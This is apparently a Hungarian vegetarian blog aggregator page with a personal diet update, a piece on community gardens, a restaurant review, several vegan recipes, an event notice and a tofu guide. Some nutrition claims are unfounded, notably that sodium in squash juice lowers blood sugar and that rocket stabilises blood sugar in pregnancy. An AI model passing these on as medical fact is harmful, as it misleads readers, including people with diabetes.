Hát, üdvözlet minden kedves még idelátogató régi és új olvasónak!:-) Eddig bírta a lelkiismeretem...:-) Az elmúlt hetekben már napi szinten dörömbölt, hogy ismét írjak Nektek, hírt adjak magunkról, hiszen lassan már 7 hónap telt el az utolsó bejegyzés óta! Figyelem, hosszú lesz!!!:-) Ezért előreláthatólag két részletben nyilatkozom...:-))) Na, szóval, megpróbálom összeszedni... Az eltűnés legfőbb oka... Hát, az egyik legfőbb és legfontosabb, hogy 6 év gyes után ismét dolgozni kezdtem!:-)) Sőt, ami még csodálatosabb, hogy tavaly ősszel valóra vált egy nagyon régen, közel 15 éve dédelgetett álmom! Sikerült megnyitni Budapesten Magyarország első CANTIENICA Stúdióját!:-) 13 évvel ezelőtt kezdtem el Svájcban tanulni egy nagyon különleges alakformáló és testtartásjavító módszert, amit azóta is édesanyámmal még csak ketten tanítunk Magyarországon (sajnos!). Imádom a munkát, imádom EZT a munkát, amit már biztosan tudok, hogy az utam!:-) Ugyanakkor egy új vállalkozás beindítása, egy új módszer megismertetése gyakorlatilag a nulláról, sok munkával, és talán még több időbefektetéssel jár! Így az elmúlt években a főzésre, a blogolásra szánt idő teljesen átalakult! Sőt, igazából be kell, hogy valljam, hogy míg a gyes évei alatt folyamatosan a különféle recepteken, vegán megoldásokon agyalogtam, addig mostanság pl. a gerinc és az emberi test anatómiája, német szakcikkek fordítása és különféle marketingmegoldások tárháza az, ami kitölti az agytekervényeimet...:-)) Tehát, ha pl. fáj a hátad, lábad, nem rég született babád, netán frissebb, szebb arcvonásokat szeretnél, keress meg személyesen!:-))) KLIKK IDE! Vegaság/ vegánság... Nóóó para, én azért vega maradtam!:-))) Immáron lassan 21 éve (Úristen! Hát igen, 18 évesen kezdtem, lehet kiszámolni, most mennyi vagyok...:-)))). Na, de azért változások, tapasztalások voltak ezen a téren is az elmúlt 1-2 évben... Pl. tavaly nyáron igen erőteljesen elkezdett hullani a hajam... Az ok sokféle (lehet), én mindig abból indulok ki, hogy minden fizikai tünet mögött lelki elindító tünetek vannak... Nagyjából megleltem... Aztán elmentem vérvételre, és hát vashiány... Igen, vállalom!:-) Mert hogy bármilyen fajta étkezési irányzatot is képviseljen vki (és lehet akár húsevő is!), ha nem figyel az étkezésére kellőképpen, akkor idővel különféle hiánytünetek léphetnek fel nála... És hát miután már mindkét gyerek óvodába kezdett járni, és pedig dolgozni, hirtelen beleuntam és sajnáltam az időt a vegás főzőcskékre = szendvicsek, félkész kaják, sok szénhidrát. Ez kilókban és kiegyensúlyozatlan tápanyagbevitelben mutatkozott meg. Ja, meg most már nagyon pontosan megfigyelhető tüneteggyütesben: reggelenként enyhe remegés, napközben ólmos fáradtság, mindig aludnék, és egyre csökkenő étvágy, olyan nem kívánok semmit sem állapot. Vérvétel, kiderül vashiány, újratankolás... jajaja, nagyon nincs ez jól így! A hajhullás kapcsán előkerültek mindenféle vitaminok, homeopátia, stb. és aztán lassan megállt (kb. 3 hónap után). Jól megnyugodtam, majd ismét szépen visszaálltam a rossz szokásokra, és hát most megint hullik... Ja igen, az még fontos infó, hogy közben ismét elkezdtem sajtot és időnként tojást enni (biztosan a B12 miatt is van a hajhullás, gondoltam...). Hát, nagyon nem esett/ esik jól!!! Puffadás, émelygés, erőteljesen visszatérő allergiák (garatcsorgás, orrdugulás stbstb.). Áááá, nem nekem való ez továbbra sem!:-) Változtatni szükséges, ez nem vitás! És hát az is fontos infó, hogy gyakorlatilag életemben először, és mióta egyáltalán főzök, közel 40 évesen, elkezdtem megtanulni húst főzni a családnak... Feladtam a küzdést, hogy rajtam kívül mindenki húsevő, és hát azt sem lehet, hogy nekik mindig félkész kajákat adjak... A lelkiállapotot nem részletezném, sokféle volt a folyamat (undor-viszolygás-elkeseredettség stbstb.). A kaják pedig ennek megfelelően is sikerültek... Aztán majd egyre jobban... Legalábbis ezt mondják... Én nem kóstolom meg... A 7 éves fiam viszont nagyon tuti szakács lett közben, és besegít!:-) Kiváló ízérzékeléssel, és késztetéssel a konyha iránt! EGYEDÜL készít már (rizs)tejbegrízt, pudingot, palacsintát (meg is pörgeti a levegőben:-)), és legutóbb egy egész délelőttöt szánt arra, hogy ARANY GALUSKÁT készítsen!!:-) Én csak gyakorlatilag szakácskönyvből felolvastam neki a részleteket, ő pedig csinálta! A tészta dagasztásától a szaggatásig, diódarálásig, és sütőbe betolásig! És önállóan kreál is a konyhában: desszerteket, koktélokat...:-)) (bár nem mindig ehetőek-ihatóak, de nagyon nagy a lelkesedése:-))) Azt gondolom, az elmúlt évek konyhai időtöltései itt hozták meg az egyik gyümölcsüket!:-) A 4 éves lányom ugyancsak eszik húst, de ő kb. 50%-át annak, amit a fiam. Sokszor napokig ki is hagyja, és csak könnyebb húsféléket, halat eszik. Amikor viszont a családnak megfőzök egy 3 fogásos ebédet, magamra nem marad már energiám... De most változtatnom kell a saját étkezésemen, nincs mese! Készülök valamire nagyon, az életmódváltásommal kapcsolatban, de erről majd egy külön bejegyzésben!;-) Szerintetek mit tervezek? Tippeket szívesen fogadok!:-)
Súlyos élelmiszerkrízis várható: a közösségi kertek segíthetnek?
A berlini Princessinnen Garten közösségi kert http://prinzessinnengarten.net/ Nagyon is aktuális a fenti kérdés... Az élelmiszerárak - világszinten - már a nyár folyamán emelkedtek, és az ENSZ mezőgazdasági szervezete megállapította, hogy az öt- hat évvel ezelőttihez hasonló ellátási krízis alakulhat ki, és a szervezet előrejelzése szerint további élelmiszerdrágulás várható. Márai Géza, a gödöllői Szent István Egyetem címzetes egyetemi docense kifejtette, hogy az élelmiszerárakat nem csak az adott év szárazsága, időjárása befolyásolja, hanem hosszú és középtávú tényezők is. Így például a robbanásszerű népességnövekedés, az általános energiadrágulás, a termőterület kiterjedésének és a termőföld minőségének csökkenése is fontos tényezők. Óriási mértékű a talaj savanyúsodása és a tengerekben lejátszódó hasonló folyamat, amit a szén-dioxid beoldódása okoz. Általában a környezetrombolás és a klímaváltozás is negatív irányba mutat. Az üzemanyagár emelkedése, illetve a szállítási költségek növekedése miatt egyre jobban ,,bezárkóznak az országok, ami arra ösztönöz, hogy minél nagyobb mértékben támaszkodjanak a helyben megtermelt agrárárukra. Ebben a helyzetben alapvető az önellátás és a saját stratégiai raktározás. A megoldás része lehet a közösségi kertek elterjesztése. Ma már több ilyen kezdeményezés is elindult hazánkban, hol alulról szerveződően (pl. a Földkelte kert) hol pedig az önkormányzattal karöltve (pl. Kispesten). Korábban nem nagyon akarták az önkormányzatok felvállalni egy közösségi kert megvalósításának feladatát, illetve az önkormányzati jog sem definiálta , hogy milyen módon lehet ilyen kezdeményezést megvalósítani. Budapesten a XIX. kerületben pl. két év jogi, szervezési, döntéshozói folyamat eredményekéntkészülhetett el a kert. A városlakók jelentős részének viszont azonnal tetszett az ötlet, szinte azonnal megvolt az induló létszám, és mára több mint 100 fős a várakozólista. A városi kertekben nem szabják meg, hogy ki mit termeljen - ha virágot akar valaki termelni, azt is megteheti. A kert használatáért pedig csak a kerti munkájukkal fizetnek a résztvevők. Az igazi hangsúly a közösségépítésen, szomszédsági közösségek alakulásán van. A kert ebből a szempontból kiváló terep! Forrás:Kislábnyom hírlevél Híradó , FMH , http://kozossegikertek.hu/
Sok magyart megmentene a hús elhagyása
Közel harmadával alacsonyabb a szívbetegségek kialakulásának kockázata a kizárólag növényi alapanyagokat tartalmazó vegetáriánus étrend híveinél, a húst rendszeresen fogyasztókkal összehasonlítva.
Ebédet házhoz - a Vegafood-tól
2013. január 30. Lét-tudatos konyha
Előfordul, hogy nem érek haza ebédre és éppen nem főzök olyat, amit kényelmesen magammal tudnék vinni. Ilyenkor rendelek. Többnyire olyan ételt, amit én nem, vagy ritkán készítek. Ez olykor ötletet is ad a későbbi otthoni kipróbáláshoz. Választásomat sokszor az vezérli, hogy egy-egy jól hangzó név felkelti a kíváncsiságomat: vajon mit takar az illető étel, ők mivel készítik? Ha magyar(os) étel nevét halljuk vegetáriánus módon elkészítve, sokan azt gondolják, hogy szójával készül. De nem feltétlenül, mert szerepelhet benne szejtán (búzahús), tofu, padlizsán vagy sajt is. A magyar konyha hagyományos és népszerű ételei közé tartozik a paprikás krumpli és a rostélyos. A Vegafood étlapját böngészve -két egymást követő héten- rájuk esett a választásom. Kíváncsi voltam, hogy hogyan és miként készül náluk ez a két étel. Mexikói paprikás krumpli szezámos tejföllel és paradicsomos rostélyos füstölt sajttal, kuszkusszal néven szerepeltek a listán. A paprikás krumpli enyhén, kellemesen csípős ízű volt. Gabonakolbász járt mellé, aminek fűszerezése számomra kellemes megtapasztalás. A vega kolbászok ugyanis általában nagyon fokhagymásak, amit én nem szeretek. Úgyhogy külön öröm, hogy ezt a kolbászt nem fokhagymával ízesítették. A tejföl pedig jól ellensúlyozta az étel fűszeres jellegét. A másik étel, a rostélyos, szejtánnal készült. Állagát tekintve, omlós és a ,,pont jó kategória. Szejtán készítésekor ugyanis hibaforrás lehet: Túlfőzzük és szétmállik. Túl kemény lesz, és csizmatalpszerűvé válik. Rágós lesz, és ,,rántott rágógumi benyomását kelti. A paradicsomos szaft fűszerezése is ízlett. Köretként kuszkusz volt, habár ezt ritkán eszem, jobban szeretem a barna rizst, a kölest vagy a hajdinát. Mindkét magyaros étel jó választás volt, így valószínűleg máskor is rendelni fogom őket. Szejtán házi készítése: itt
Ruccolás tészta
Mostanság gyakrabban kerül rukkola az asztalra.Régebben nem igazán szerettem, de a 2012-es év meghozta a változást. Nem tudom, hogy az Eleken eltöltött időnek köszönhetem-e, ott ugyanis nyersen, más zöld növényekkel együtt fogyasztottam. De az is lehet, hogy a valamivel nyersebb táplálkozásra való áttéréssel változik az ember teste és az, hogy mit kíván. Ahhoz képest, hogy a rukkola bizonyos vidékeken vadon megterem (Portugália, Spanyolország, Görögország, a Földközi tenger partjaihoz tartozó országok) elég sokára fedeztem fel ezt a zöld növényt. Kevesen tudják, hogy a káposztafélékhez tartozik és ráadásul virágzó növény, amely éjszaka árasztja illatát. Mivel a gyomorra jótékony hatással van, konkrétan gyomorsav kiválasztódás mennyiségét kordában tartja, gyomorfekély és savtúltermelődés esetén különösen ajánlatos fogyasztani. Mivel sötétzöld növény, így jótékony hatással bír a vér cukorszintjére, koleszterinjére, sőt hosszútávú fogyasztása még a kellemetlen testszag leküzdésében is szerepet játszhat. Ajánlják fogyasztani várandós anyukáknak is, egyrészt a már említett vércukorszintet stabilizálhatja, így segít megelőzni a kismamakori cukor megemelkedését, másrészt pedig az ilyenkor szokásos rosszullét tüneteire is mérséklően hat. Nem véletlen borsmustárként nevezik magyar nyelven, hiszen íze hasonlít a bors és a mustár ízeihez. A recept: Hozzávalók: 1 marék aszalt paradicsom apróbb darabokra vágva 1 nagyobb fej lilahagyma 2 szál újhagyma 2 db piros színű paprika (kápia, kaliforniai vagy pritamin) egy marék ruccola (megmosva, lecsepegtetve fél marék apróra vágott dió 2 dl növényi tej leheletnyi szerecsendió ételízesítő 50 dkg tészta (durum, vagy teljes kiőrlésű) víz só Elkészítés: A tésztát lobogó sós vízben al dentére főzzük. Közben a felaprított lila hagymát, újhagymát, paprikákat, aszalt paradicsomot és az aprított diót megpirítjuk, majd hozzáadjuk a növényi tejet. Amikor a hagymák és a paprika kicsit megpuhult, beleszórjuk a rukkolákat, amiket persze előtte megmostunk, lecsepegtettünk. Nem muszáj összevágni.Adunk az egészhez egy kevés ételízesítőt és szerecsendiót. Fedő alatt rottyan egy picit és kész is a szósz.Utólag még tehetünk hozzá fél maroknyi teljesen nyers ruccolát. Megdobja az ízét. Ha a növényi tejünk nem elég - mármint a 2 dl, akkor a megfőtt tészta vizéből vegyünk le egy keveset még hozzá. A megfőtt tésztát leszűrjük összekeverjük a szósszal és kész is a finom "tésztasalátánk", amely önmagában is megállja helyét. Tésztasalátaként, vagy főételként is fogyasztható. Mi nagyon szerettük. Munkába is ezt vittük magunkkal.
Vegán chocolate chip cookies
2013. január 8. Zizi kalandjai
Igen, tudom... miért nem magyarul van megadva a cím?! Valahogy így mondanám: vegán csokoládécseppes kekszek. Nem hangzik rosszul, de fura. Szerintem a chocolate chip cookies már annyira beépült a köztudatba, hogy nagyon sokan ismerik így is (még a Wikipédia is szentel neki egy külön oldalt). Ezek a kekszek is karácsonyra készültek, bevallom nekem a kedvenceim lettek az öt-hatféle változat közül. Vágytam már igazi amerikai chocolate chip cookies-ra, csak egy kicsit egészségesebb változatban, kevesebb cukorral édesítve és vegánul elkészítve. Nagyon sok recept kering az interneten, nem nehéz találni egy tutit. Vegán változat azonban kevesebb van. Én Emily receptjét vettem alapul, néhány apróságon változtattam, többek között a cukor mennyiségét csökkentettem. Amit pedig először csináltam az az, hogy a kókuszzsírt nem olvasztottam fel hozzá, hanem hagytam megpuhulni szobahőmérsékleten, így a puha kókuszzsírral kevertem ki a nádcukrot, mintha vajat használtam volna. Meg kell mondanom, hogy nagyon tetszett az élmény. A tésztájába került banán édesít rajta és kicsit puhává teszi a kisült kekszeket. Két héttel később dobozban tárolva még mindig puhák voltak. A két hét nem azt jelenti, hogy ennyire nem ízlett volna, hanem annyi süteményünk, édességünk volt az ünnepek alatt és után, hogy nem győztük I.-vel megenni őket. Apropó, cukor és édesség. Emlékeztek, hogy tavaly februárban kihívás elé állítottuk magunkat és végig csináltunk egy hardcore 25 napos cukormentes hónapot? Nos, vannak, akik már érdeklődtek nálam, hogy az idén tartanék-e újra cukor- és édességmentes hónapot, mert csatlakoznának a kihíváshoz. Ha lenne kedvetek egy ilyenben részt venni, jelezzétek itt a recept után kommentben. Még az is lehet, hogy valamilyen nyereményért csinálnátok a kihívást és jutalmat kapna a legkitartóbb a kihívás végén! ;) Na, mit szóltok hozzá? Vegán chocolate chip cookies Hozzávalók: - 120 g teljeskiörlésű tönkölyliszt - 135 g tönköly fehérliszt - 110 g nádcukor - 120 g kókuszzsír, puha állagban - 80 g ét csokibogyó/csokicsepp - 1 db érett banán, meghámozva, villával pépesre törve - 1 teáskanál szódabikarbóna - 1/2 teáskanál só - 2 evőkanál mandula/rizs/zab/szójatej - 1 vaníliarúd kikapart magjai Egy tálban keverjük össze a száraz hozzávalókat: lisztek, szódabikarbóna, só. Egy másik tálban keverjük ki a nádcukrot a puha kókuszzsírral (én most ezt a változatot használtam). Ha már habos a kókuszzsír, adjuk hozzá a banánpépet, a vaníliát és a növényi tejet. Jól keverjük el, majd öntsük a száraz hozzávalókhoz. Adjuk hozzá a csokoládét és keverjük át a tésztát (puha, enyhén ragacsos, de jól formázható tésztát kell kapnunk). Melegítsük elő a sütőt 180C fokra és béleljünk ki egy nagy tepsit sütőpapírral. Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra és egy kicsit lapítsuk le a tetejüket. 15-20 percig süssük, amíg aranybarnák lesznek. Ebből a mennyiségből kb. 25 db lesz.
Vega kocsonya
2012. december 31. Lét-tudatos konyha
Évekkel ezelőtt találkoztam ezzel a recepttel egy kedves ismerősöm blogjában (Ksatriya). Hozzávalók 2 nagy tálnyi mennyiséghez: 1 evőkanál olaj 1/4 mk hing (indiai fűszer) 2 vékony sárgarépa 1 fehérrépa 1 kis, kb. 5 cm hosszú zeller 1 evőkanál zellerzöld (nekem nem volt) 1/2 mk tört mustármag 1/2 mk egész bors, kissé megtörve 1 evőkanál só kb. 1,2 liter víz 2 ek olaj 1 csg füstölt tofu (ez nekem sok lett hozzá) piros fűszerpaprika-őrlemény, vagy chili-őrlemény, ízlés szerint 1,5 teáskanál agar-agar Elkészítése: Kevés olajon megpirítom a hinget. A szemes fűszeret mozsárban kissé összetöröm. A hosszúkásra vágott zöldségeket vízbe teszem, hozzáadom az 1 ek olajat és teatojásban a fűszereket. Miközben a leves fő, a tofut felszeletelem tetszőleges nagyságú darabokra. Egy serpenyőben az olajon mindkét oldalát megpirítom. Mikor a leves elkészült, a zöldségek nagy részét kiveszem belőle. (Annyit hagyjunk benne, amennyit a kocsonyával együtt meg akarunk enni.) Egy pohárban, kb. 1 dl vízben feloldom az agar-agart és lassan a forró leveshez öntöm. Elkeverem és a még forró levest tányérokba porciózom a benne maradt zöldséggel és a sült tofudarabokkal együtt. Hűvösre teszem. Mikor megdermedt, fűszerpaprika-őrleménnyel vagy a chili-őrleménnyel lehet megszórni a tetejét. Hing helyett készíthető magyaros ízekkel pl. hagymával is. Ez esetben a hagymát a répával és a többi zöldséggel együtt tegyük a levesbe. Kapcsolódó receptek: itt
Szaloncukor - Narancsos marcipán
2012. december 15. Fittanyuka Blog
A szaloncukorról most már elmondhatjuk, hogy igazi hungaricum. Habár az én gyermekkoromból nincsenek szép emlékeim a szaloncukorról. Ennek az egyik oka, hogy Erdélyben mi is ugyanígy a magyar szokások szerint tartottuk a Karácsonyt, de mivel Romániában nem ismerték el a magyar szokásokat ezért szaloncukrot sem árusítottak sehol. Ezért házi szaloncukor volt mindenkinél, ami valamiféle olvasztott cukor volt selyempapírba csomagolva, amelybe gyerekként majdnem beletört a fogunk. Ráadásul inkább csak szimbólumként lógtak, kőkeményen a fán, mert nagymamám gondosan évente újracsomagolta őket. Én nem rajongtam értük, ezért nemis kísértettem a sorsot, ellenben az öcsém:). Ha akkor ezt a receptet átadhattam volna a nagyimnak... Másik emlékem amikor kisiskolásként, király lány jelmez hiányában anyukám legnagyobb csalódásom ellenére szaloncukornak öltöztetett:)) Nézzük a receptet: Ez már a nyers édesség kategóriába tartozik, könnyen, gyorsan elkészíthető. Csomagolhatjuk saját kezűleg dekorált selyempapírba, vagy csomagolás nélkül akár csak a fa alá is tehetjük. Hozzávalók ( kb. 30 darab) 250g darált mandula ( mandula liszt) 60 g nyírfacukor porrá darálva 2 teáskanál útifűmaghéj őrlemény 5-6 csepp bio narancsolaj ( sütéshez való) 1 evőkanál kókusz olaj 1/2 bio narancs reszelt héja késhegyni őrölt bourbon vanília 100 ml meleg víz 150 g Étcsokoládé bevonó Először a mandula lisztet összekeverjük a por nyírcukorral, vaníliával, reszelt narancs héjával, útifűmaghéj őrleménnyel, majd hozzáadjuk a meleg vizet. Kézzel is átdolgozhatjuk, de homogénebb masszát kapunk ha kézi robot gép segítségével kicsit összedolgozzuk. Hűtőbe pihentetjük minimum fél órát. Nedves kézzel újra átgyúrjuk a masszát és hengert formálunk olyan vastagságút amilyen vastag szaloncukrokat szeretnénk. Késsel feldaraboljuk a hengert és a félkész szaloncukrokat egy tálra helyezzük. Mélyhűtőbe helyezzük őket kb. 10 percre. Víz gőz felett felolvasztjuk az étcsokoládé bevonót és a szaloncukrokat egyenként belemártjuk, majd sütő papírra helyezzük őket. Ha megdermedt a csoki réteg csomagolhatjuk. Hűvös helyen tároljuk, de nem fontos hűtő szekrényben. Tipp: Az a tapasztalatom, hogy más olajosmag őrleménnyel készítve, akár vegyesen is nagyon finom az összhatás! Pl: darált dió, török mogyoró. Fittanyuka
Mandarin - vajon a pocaklakó is szeretni fogja?
2012. november 29. Napló étkeinkről, életünkről
Pici lányom már 7 hónapja lakik a pocakomban, remélem kényelmesen üldögél, és majd 2 hónap múlva megfordul, hogy probléma nélkül kibújhasson. :-) Kíváncsi vagyok, hogy igaz-e, amit már sokszor hallottam, hogy a gyermek azt fogja szeretni, amit az anyja is eszik: most például mandarint napi 1-1,5 kg-t, aszalványokat, mert már fűtünk és én ilyenkor készítek, zöld salátákat, és persze párolt zöldségeket, minimális pékáruval. köménymagos szezámmagos répaaszalvány maradékaGondolkoztam, hogy most miért vagyok oda ennyire a mandarinért, de pontos magyarázatot nem találtam. Azt mondják, a citrusfélék hűtő hatással vannak az emberre, vagyis pont nem ilyenkor kellene ennünk, de nekem most állandóan melegem van, valószínűleg a bennem keringő megnövekedett vérmennyiség miatt. Így lehet, hogy tényleg hűtőhatása miatt kívánom annyira :-)
Nyers vegán putluck jógával! November 24. 14 órától
2012. november 22. Nyersétel akadémia
Mit is jelent az a szó, hogy “potluck”? Egy különleges találkozót jelent, ahol hasonló érdeklődésű emberek összejönnek, beszélgetnek, megosztják élményeiket, gondolataikat. És jó magyar szokás szerint, itt is eszünk, iszunk, hiszen ez a közös érdeklődés éppen az ételek köré irányul: közös bennünk az, hogy mindannyian szeretjük a nyers zöldségek ízét, a nyers édességeket, leveseket, salátákat, stb… Minden vendég hoz egy tál élő, nyers ételt, ami lehet bármi, ami növényi, feldolgozatlan alapanyagokból sütés és főzés nélkül készült. Ezeket az ételeket közösen fogjuk elfogyasztani a beszélgetés után. A mostani potluck még különlegesebb, mint az eddigiek, mert előtte Gauranga Das, az Atma Center jógaoktatója fog nekünk egy remek jógaórát tartani! a program: 14 órától jóga 15 órától potluck átrendezzük a szobát “jógázósról” “evősre” kipakoljuk az ételeket az asztalra beszélgetés, mindenki elmondja, honnan jött, mit hozott közösen elfogyasztjuk az ételeket A belépő 1000 forint, ha hozol magaddal egy tál élő ételt. Ha üres kézzel jössz, akkor 2000 forint (majd én készítek helyetted is valami finomságot) Jelentkezz nálam itt: gitta@nyersetelakademia.hu vagy telefonon: 30 9848931 Címünk: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő Várunk szeretettel!
Fjällräven Polar
2012. november 19. Punk In The Kitchen
Lesz jövőre egy ilyen túra, a sarkkörön túl: Fjällräven Polar Trailer 2013 from Fjällräven on Vimeo.Ahhoz hogy bekerüljünk, minél több szavazatra van szükségünk. Nézd meg a videónkat és szavazz ránk, hogy a magyar színeket képviselhessük! Csak egy facebook account kell hozzá és két perc. (Van, hogy többször kell a VOTE gombra nyomni a sikeres szavazathoz!) Az oldalunk: http://tinyurl.com/a48vuqw Köszönjük!
Tofu egyszeregy
2012. november 13. Zizi kalandjai
Kemény tofu A következő receptes bejegyzés előtt egy picit ismerkedjünk a tofuval! Ki az, aki szereti, ki az, aki utálja? Kóstoltátok már egyáltalán? Mi a véleményetek róla? Elmesélem, hogy nekem mi volt. Először nagyon idegenkedtem tőle, főleg a génmódosítás miatt. Kezdjük azzal, hogy mi is az a génmódosítás? Azokat nevezzük génmódosított élőlényeknek (angolul Genetically Modified Organisms, röviden GMO), melyekbe valamilyen más élőlény egy ismert funkcióval rendelkező génjét laboratóriumi körülmények között bevitték, és ott működésre kényszerítették annak érdekében, hogy a befogadó szervezet új tulajdonságokkal rendelkezzen - Móra Veronika, Ökotárs Alapítvány szakértője. Ez tehát lehet egy vagy több genetikai elem, és a hangsúly a laboratóriumi körülményeken van, hiszen a módosult szervezet nem keresztezés vagy mutáció által jött létre. A génmódosítás a fajok közötti határokat is átlépi. Magyarországon az új Alaptörvény külön cikkben rendelkezik a genetikailag módosított élőlényektől mentes hazai mezőgazdaságról, noha termékekben (főleg húskészítményben) előfordul génmódosított összetevő. A terméken jelölni kell a genetikailag módosított összetevőt - ez azonban a gyakorlatban koránt sincs mindig így. (A génmódosításról, a szabályokról még többet olvashattok itt, itt, itt, itt és itt.) Főleg ezért nem ettem tofut, annak ellenére, hogy már vegetáriánus voltam javából. Aztán felmértem a hazai piacot és találtam olyan tofut, amely magyar nem génmódosított szójából készül, így gondoltam, hogy adok neki egy esélyt. Fokhagymával pirítottam össze a felaprított tofu kockákat és nagyon jól sikerült. Ízlett. Úgy döntöttem, hogy adok neki esélyt és bevezetem a táplálkozásomba. A tofu egy kínai eredetű élelmiszer, melyet szójababtej megaltatásával és a visszamaradt túró összenyomásával készítenek. A tofu a kínai konyha alapvető élelmiszere és hagyományosan része a japán, koreai és a délkelet-ázsiai országok konyhájának is. A legtöbb tofu fehér vagy világossárga, azonban létezik barna tofu is. A tofu egyik kiemelkedő érdeme a magas fehérjetartalma. Tartalmaz nátriumot, foszfort, vasat, kálciumot, gazdag B1 és B2 vitaminban. Jó hatással van a szív-és érrendszeri megbetegedésekre, az anyagcserére, a zsír és cukor felszívódására és nem tartalmaz koleszterint. Szagtalan, semleges az íze és az aromája, így hihetetlenül sokoldalú. Használhatjuk előételekhez, levesekhez, főfogásokhoz, köretekhez és desszertnek is. Balról jobbra fentről lefelé: préselt (fehér), kemény, lágy vagy selymes, közepesen kemény, préselt (barna), szuper kemény A tofu fajtái Lágy/selymes tofu (friss) Ennek a legmagasabb a víztartalma, ugyanis a lágyságot úgy érik el, hogy a tofut megalvasztják anélkül, hogy kipréselnék belőle a felesleges vizet. Finom, selymes, pudingszerű az állaga, ezért kiváló vegán süteményeknél, tortáknál krémek készítéséhez. 85 grammból 4-5 gramm a fehérjetartalma. Én még nem dolgoztam vele, noha szemeztem már vele az üzletekben, hogy megveszem. Azt hiszem egy vegán krémes tortáért érdemes kipróbálni. Közepes és kemény tofu (friss) Nagyon hasonlóak, csak az egyik keményebb, mint a másik. Az eljárás során a szójatej alvadásakor szétválasztják a túrót és a savót, aztán összesűrítik a túrót. Ez az, amitől keménységet kap, de még mindig magas a víztartalma, azonban kevésbé sérülékeny, mint a lágy tofu. Enyhén rücskös a külseje, keménysége a nyers húséhoz hasonló, de általában annál rugalmasabb. Külföldön megkülönböztetnek még extra kemény és szuper kemény változatot is. 85 grammból 6 és 14 gramm közötti a fehérjetartalma. Az itthon kapható tofuk közül a leggyakoribb a kemény tofu, én is ezt használom szinte mindenhez. Szárított tofu (friss) Extra kemény tofu fajta, amelyből rengeteg vizet kipréselnek. Rugalmas, gumis az állaga. Egyik fajtáját nagyon laposra préselik és vékony csíkokra vágják, így úgy néz ki, mintha friss tészta lenne. Még nem találkoztam ilyennel. Pirított tofu (feldolgozott) Ha a tofut megpirítják, még keményebb és húsos lesz, ezért nagyszerű kiegészítő lehet levesekhez, zöldséges ételekhez. Kívül aranysárga, belül fehér színű. Ugyanez elérhető, ha kemény tofut pirítunk meg, de ha sietünk a főzéssel, jól jön az előre pirított tofu. Fermentált és büdös tofu (feldolgozott) A Wikipédia megemlíti még ezeket is, mint tofu fajtákat. A fermentált változat előre felkockázott tofu darabokból áll, amelyeket levegőn kiszárítanak és baktériumokkal erjesztenek. Ezeket a falatokat aztán rizsbor, sós víz, ecet és darált chili paprika keverékébe teszik, de van olyan fajtája, melyet rizsszemek, babpástétom és szójabab keverékébe helyeznek. A büdös tofu lágy fajta, amelyet zöldségek és halszósz keverékében erjesztenek. Ízesített tofu (feldolgozott) Természetesen van édes és sós változat. Készítésekor a szójatejhez kevernek gyümölcsöt, cukrot vagy tojást. Tofuból, vagyis szójatejből készített egyéb termékek A tofu készítés során melléktermék is keletkezik, ilyen a tofu kéreg (vagy bőr). A szójatej forralása (ugyanúgy, mint a tehéntejnél) során a tej tetején vékony filmréteg képződik. Ezt aztán összegyűjtik és sárgás lapos tésztaszerű anyaggá préselik. Állítólag minden tofut szeretőnek egyszer ki kell próbálnia a tofu kérget. A kínai és a japán konyhában népszerű. A felesleges víz kipréselése a tofuból Ha tofuból készítünk valamit, érdemes előtte mindig kipréselni belőle a felesleges vizet. Így a tofu jó sűrű lesz és elkészítése után könnyű rágós lesz az állapota. Ehhez a folyamathoz szükségünk lesz konyhai papírtörlőre, egy konyharuhára és néhány szakácskönyvre, nehezéknek. :) 1. Csomagoljuk a tofut egy réteg papírtörlőbe. 2. Csomagoljuk a tofut még egy réteg papírtörlőbe. 3. Két réteg papírtörlő után jól csomagoljuk be egy konyharuhába. 4. Tegyünk a tofu csomagunk tetejére néhány szakácskönyvet nehezéknek (stílszerűen választottam a nehezékeket :)). Hagyjuk ilyen állapotban 20-60 percen keresztül, attól függően, hogy mennyi időnk van. Közben persze előkészíthetjük az ételünk többi hozzávalóját... vagy akár szakácskönyveket is lapozgathatunk, ha már mindennel készen vagyunk. 5. Kockázzuk vagy szeljük fel a préselt tofut és már készíthetjük is a finomságot! Remélem ezzel a kis összefoglalóval kedvet hoztam nektek a tofuhoz. Főleg azoknak, akik eddig még nem kóstolták, nem főztek belőle semmit. Húsevőknek is bátran ajánlom, hogy néha-néha egy-egy szelet hús helyett inkább tofuból készítsenek valamit. Ha jól be van ízesítve, tényleg nagyon finom, én legalábbis nagyon megszerettem. Sok recept van már a blogomon, amelyek adhatnak ötletet, inspirációt, de tervezem, hogy még több lesz, hogy segítsek széleskörűvé tenni a tofut. Szóval hajrá! Adjatok egy esélyt a tofunak! Források: Wikipédia Harmonet: Mi a tofu? Wellness tippek: Mi a tofu? Andrea Nguyen: Asian Tofu Naomi Moriyama and William Doyle: Japanese Women Dont Get Old or Fat
Almás rakottas
Drága barátnémnál voltam ma Magyarnándorban egy kis tere-ferén, és tőle tanultam ezt a finomságot Köszi Kriszti ? Hozzávalók: 4 db alma 10 db háztartási keksz 3 dl forrásvíz 1 vaníliapuding, vagy ( 1 ek kukoricakeményítő + 1 tk vaníliapor) 3 db szegfűszeg 2 rúd fahéj 1 marék mazsola 1 ek goji bogyó Az almát megmostam, [...]
Tök jó fasírt :) (vegán)
Hallottad már, hogy valakire azt mondták, "Te egy dinka vagy!" Talán kevesen tudják, hogy bizonyos magyar területeken a tököt, konkrétan a főzőtököt nevezik dinkának. A patiszon és az uborka rokonaként elmondhatjuk, hogy cukorbetegeknek akár nyersen fogyasztva is ajánlott. Olyan egyszerű oknál fogva, hogy a levében található só illetve nátrium étkezés után a vérbe felszívódik, ezzel párhuzamosan csökken a vér cukorszintje. Nem beszélve arról a jó tulajdonságáról, hogy fehérje, zsír és szénhidrát tartalma is meglehetősen alacsony, így a magas koleszterinszinttel élő emberek számára is ajánlott a tök fogyasztása. Persze nem zsíros oldalassal vagy valamilyen húsból készült pörkölttel! Anyuéknak szépen termett idén a tök és a cukkini. Még a hidegebb napok beállta előtt kaptunk tőlük egy szép tököt, amit lereszelve fasírtnak készítettem el. Szuper finom íze lett. Ennek a receptjét osztom most meg a Kedves Olvasóval. A recept: Hozzávalók: 1 tök 1 bögre zabpehely kevés zsemlemorzsa 1 fél fokhagyma 1 evőkanálnyi kapor (fagyasztóból vettem elő) 1 teáskanál őrölt kömény (ízlés szerint több is használható, vagy el is hagyható) só, bors vagy borsikafű, 